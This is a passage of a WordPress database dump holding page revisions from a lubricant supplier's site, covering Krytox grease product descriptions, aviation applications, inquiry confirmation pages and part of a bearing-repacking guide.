href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"> XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox <a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-10-12 12:58:20', '2016-10-12 12:58:20', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2525, 2, '2016-10-12 13:17:21', '2016-10-12 13:17:21', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1, approved for incidental food contact.</a></li>\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\n</ul>\n[ux_product_categories ids="86,79" number="10"]\n\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here.</a>\n\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-autosave-v1', '', '', '2016-10-12 13:17:21', '2016-10-12 13:17:21', '', 2302, 'https://www.miller-stephenson.com/2302-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2526, 1, '2016-10-12 13:13:00', '2016-10-12 13:13:00', '<BR>\r\n<center>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\n</h3><h3>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n</center>\r\n', 'Thank You for Your Inquiry', '', 'publish', 'closed', 'closed', '', 'thank-you-for-your-inquiry', '', '', '2016-10-12 13:22:31', '2016-10-12 13:22:31', '', 0, 'https://www.miller-stephenson.com/?page_id=2526', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (2527, 2, '2016-10-12 13:13:00', '2016-10-12 13:13:00', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\r\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1</a>, approved for incidental food contact.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories ids="86,79" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here. </a>\r\n\r\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-12 13:13:00', '2016-10-12 13:13:00', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2528, 1, '2016-10-12 13:13:00', '2016-10-12 13:13:00', ' ', '', '', 'publish', 'closed', 'closed', '', '2528', '', '', '2016-10-12 13:13:00', '2016-10-12 13:13:00', '', 0, 'https://www.miller-stephenson.com/2528/', 11, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (2529, 1, '2016-10-12 13:13:00', '2016-10-12 13:13:00', '<BR>\r\nWe will respond with a quote within 3 hours.\r\n<BR>\r\nThank You\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:13:00', '2016-10-12 13:13:00', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2531, 2, '2016-10-12 13:14:00', '2016-10-12 13:14:00', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\r\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1, approved for incidental food contact.</a></li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories ids="86,79" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here. </a>\r\n\r\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-12 13:14:00', '2016-10-12 13:14:00', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2532, 2, '2016-10-12 13:18:07', '2016-10-12 13:18:07', '<h1><span style="font-size: 100%;"><strong>Krytox Aviation Greases &amp; Applications</strong></span></h1>\r\n<h4><strong>Innovations for the Aviation Industry</strong></h4>\r\nSince the first commercial application over 50 years ago, Krytox Aviation synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox™ lubricants continue to deliver extreme performance under extreme conditions. Krytox Aviation is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n<h4><strong>Examples of Aviation-Related Applications</strong></h4>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-250ad/">Krytox 250AD</a> grease provides long-life, high temperature lubrication for aircraft fuel pumps, as well as helicopter hydraulic pump splines, to help prevent fretting corrosion and provide extended service life.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease has been used to extend the service life of UAV nose landing gear in harsh climates.</li>\r\n 	<li>Krytox aviation greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/agl-683/">Krytox AGL 683</a> grease provides filled-for-life performance for aircraft climate-control and nitrogen gas system valve actuator gearboxes.</li>\r\n 	<li>Krytox AGL 829 grease provides filled-for-life, flameproof performance for thrust reverser gearboxes.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is compatible and non-reactive with a broad range of O-ring materials, allowing for extended service life and ease of assembly/disassembly. In addition, many Krytox™ lubricants specially designed for aviation applications are covered by MIL-Spec PRF-26717 and <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1, approved for incidental food contact.</a></li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a> grease is used in a wide variety of airframe applications, from engine mounts to fighter canopy slide rollers to aircraft seat adjuster mechanisms.</li>\r\n 	<li>Krytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.</li>\r\n</ul>\r\n[ux_product_categories ids="86,79" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/">To learn more about these products please click here.</a>\r\n\r\n&nbsp;', 'Krytox Aviation', '', 'inherit', 'closed', 'closed', '', '2302-revision-v1', '', '', '2016-10-12 13:18:07', '2016-10-12 13:18:07', '', 2302, 'https://www.miller-stephenson.com/2302-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2533, 1, '2016-10-12 13:19:11', '2016-10-12 13:19:11', '<BR>\r\n\r\nThank You, your quote has been received.\r\n<br><br>\r\nWe will respond with a quote within 3 hours.\r\n<BR>\r\nThank You\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:19:11', '2016-10-12 13:19:11', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2534, 1, '2016-10-12 13:19:26', '2016-10-12 13:19:26', '<BR>\r\n<h3>\r\nThank You, your quote has been received.\r\n<br><br>\r\nWe will respond with a quote within 3 hours.\r\n<BR>\r\n</h3>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:19:26', '2016-10-12 13:19:26', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2536, 1, '2016-10-12 13:20:06', '2016-10-12 13:20:06', '<BR>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:20:06', '2016-10-12 13:20:06', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2537, 1, '2016-10-12 13:20:22', '2016-10-12 13:20:22', '<BR>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\n</h3><h3>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:20:22', '2016-10-12 13:20:22', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2539, 1, '2016-10-12 13:20:59', '2016-10-12 13:20:59', '<BR>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\n</h3><h3><BR>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:20:59', '2016-10-12 13:20:59', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2541, 1, '2016-10-12 13:21:21', '2016-10-12 13:21:21', '<BR>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\n</h3><h3>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:21:21', '2016-10-12 13:21:21', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2543, 1, '2016-10-12 13:22:31', '2016-10-12 13:22:31', '<BR>\r\n<center>\r\n<h3>\r\nThank You, your inquiry/quote has been received.\r\n<br><br>\r\n</h3><h3>\r\nWe will respond within 3 hours.\r\n<BR>\r\n</h3>\r\n</center>\r\n', 'Thank You for Your Inquiry', '', 'inherit', 'closed', 'closed', '', '2526-revision-v1', '', '', '2016-10-12 13:22:31', '2016-10-12 13:22:31', '', 2526, 'https://www.miller-stephenson.com/2526-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2544, 63, '2016-10-12 13:22:57', '2016-10-12 13:22:57', '', '', '', 'publish', 'closed', 'closed', '', '2544', '', '', '2016-10-12 13:22:57', '2016-10-12 13:22:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/2544/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2546, 2, '2016-10-12 13:31:37', '2016-10-12 13:31:37', '', 'Prepare Bearings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_355004969', '', '', '2016-10-12 13:48:26', '2016-10-12 13:48:26', '', 2507, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_355004969.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2549, 0, '2016-10-12 13:42:13', '2016-10-12 13:42:13', '', '', '', 'publish', 'closed', 'closed', '', '2549', '', '', '2016-10-12 13:42:13', '2016-10-12 13:42:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/2549/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2550, 2, '2016-10-12 13:52:44', '2016-10-12 13:52:44', '<h1>How to prepare a bearing with Krytox Lubricants</h1>\r\n<h4><strong>Before You Start</strong></h4>\r\nDirt is one of a bearing’s worst enemies. That’s why it is so important to work in a clean area, with bearings and lubricants covered until ready for use. When handling bearings, wear clean elastomer gloves and use clean, lint-free rags. Compressed air, if used, should be filtered and dried. Do not spin a bearing with compressed air. Even though a bearing might not have grease or oil in it, it will have anti-rust preservatives that will prevent proper adhesion of Krytox lubricant, and the preservatives must be removed before filling the bearing. This guide explains how to prepare bearings with Krytox Lubricants.\r\n\r\nBefore adding Krytox grease to a bearing, the bearing should be cleaned of all existing greases, oils, or preservative oils used to protect it during storage. If left in the bearing, these hydrocarbon oils can form carbon\r\ndeposits at higher temperatures that may accelerate bearing failure.\r\n<h4><strong>1. Cleaning</strong></h4>\r\na. Remove the seal by carefully prying between it and the inner ring. Care should be taken to prevent the prying tool from coming in contact with any race pathway, the cage, or the rolling elements of the bearing. Shields normally cannot be removed from a bearing without causing damage; so, they are typically not good candidates for a lubricant change.\r\nb. Place the bearings in a clean wire basket and suspend the basket in a container of clean solvent. The solvent should be the type that dissolves or breaks down the particular type of lubricant in the bearing. Chlorinated solvents should be avoided, because they can leave chlorine that can cause corrosion. Fluorinated solvents are not required for hydrocarbon lubricants.\r\n\r\nc. The parts should be agitated in a bath or have the cleaning fluid pumped through the bearing to increase cleaning performance. An ultrasonic cleaner can also be used. If the parts cleaner is heated, the temperature should be maintained below the flash point of the solvent. Do not allow the solvent to get too contaminated, as cleaning effectiveness will be reduced.\r\n\r\nd. Dry the bearings by circulating warm air through the bearing or by heating to 93.3 °C (200 °F) for 10 minutes. Allow to cool to room temperature. The metal must be completely dry of all solvents, or the grease might not adhere properly and could cause the bearing to fail prematurely. Volatile solvents can also be used as a final rinse to remove heavier solvents, for speed drying, and to ensure the bearing is completely clean.\r\nHowever, volatile solvents are more flammable; so, caution must be used when handling them.\r\n\r\nAfter the bearing surfaces are clean, they should be lubricated/wiped with Krytox lubricant and properly stored to prevent corrosion. If they are not going to be packed with Krytox lubricant immediately, or if they are\r\ngoing to be in storage for an extended period, they can be dipped in Krytox ACW to coat the surface and protect against rust.\r\n<h4><strong>2. Repacking</strong></h4>\r\na. Cleaned bearings should be lubricated immediately with the specified lubricant. Rolling elements may be pre-lubricated with Krytox oil that has the same viscosity as the base oil in the grease. Lubricate each\r\nrolling element with a drop of oil and slowly rotate with a slight thrust by hand, so that the elements rotate to evenly spread the oil.\r\n\r\nb. The correct amount of grease should be weighed on a gram balance and transferred to a clean syringe. Remember that the specific gravity of Krytox grease is about 2.0 mg/L, and fill by volume rather than by weight.\r\n\r\nc. Once the syringe is packed with the correct amount of lubricant, inject half of the grease equally in each of the cavities between the rolling elements, from one side of the bearing. Repeat, using the remaining grease on the other side of the bearing.\r\n\r\nd. Rotate the bearing slowly by hand to spread and distribute the lubricant. Enough thrust should be applied by hand to cause the rolling elements to rotate.\r\n\r\ne. Replace seals or shields carefully to avoid causing damage that would allow the grease to leak out prematurely.\r\n<h4><strong>How much grease to put in a bearing?</strong></h4>\r\nProper lubrication is achieved by using the correct amount of grease. Too little grease in the bearings causes premature failure. Too much grease at the initial fill or during re-lubrication can cause overheating of bearings that are running at medium to high speed, resulting in bearing failure. The amount of grease put in the bearing depends on the application and operating speed.\r\n<ul>\r\n 	<li>For applications such as conveyor rollers and lowspeed machinery with DN values (inner race ID in mm x rpm) below 50,000, the bearing can be filled to about 60–75% of the free volume.</li>\r\n 	<li>For medium-speed applications, i.e., DN 50,000 to 200,000, the bearing can be filled 35–50%.</li>\r\n 	<li>For higher-speed systems, the fill is typically 25–35%.</li>\r\n 	<li>Some extreme-speed special applications have grease fills of only 10–15% (see Speed Factor for definition of DN values).</li>\r\n</ul>\r\nBecause Krytox grease is heavier than hydrocarbon lubricants, its higher density must be considered when determining the fill quantity by weight. Consult your bearing manufacturer for the capacity of the specific\r\nbearing you are using.\r\n\r\nTo ensure that another type of grease is not accidentally put into the bearing, grease fittings should be changed to a different style, such as button-head or pin type. A dedicated grease gun that matches the fitting should be used.\r\n<h4><strong>Speed Factor</strong></h4>\r\nThe speed factor (DN) indicates the permissible speed range for 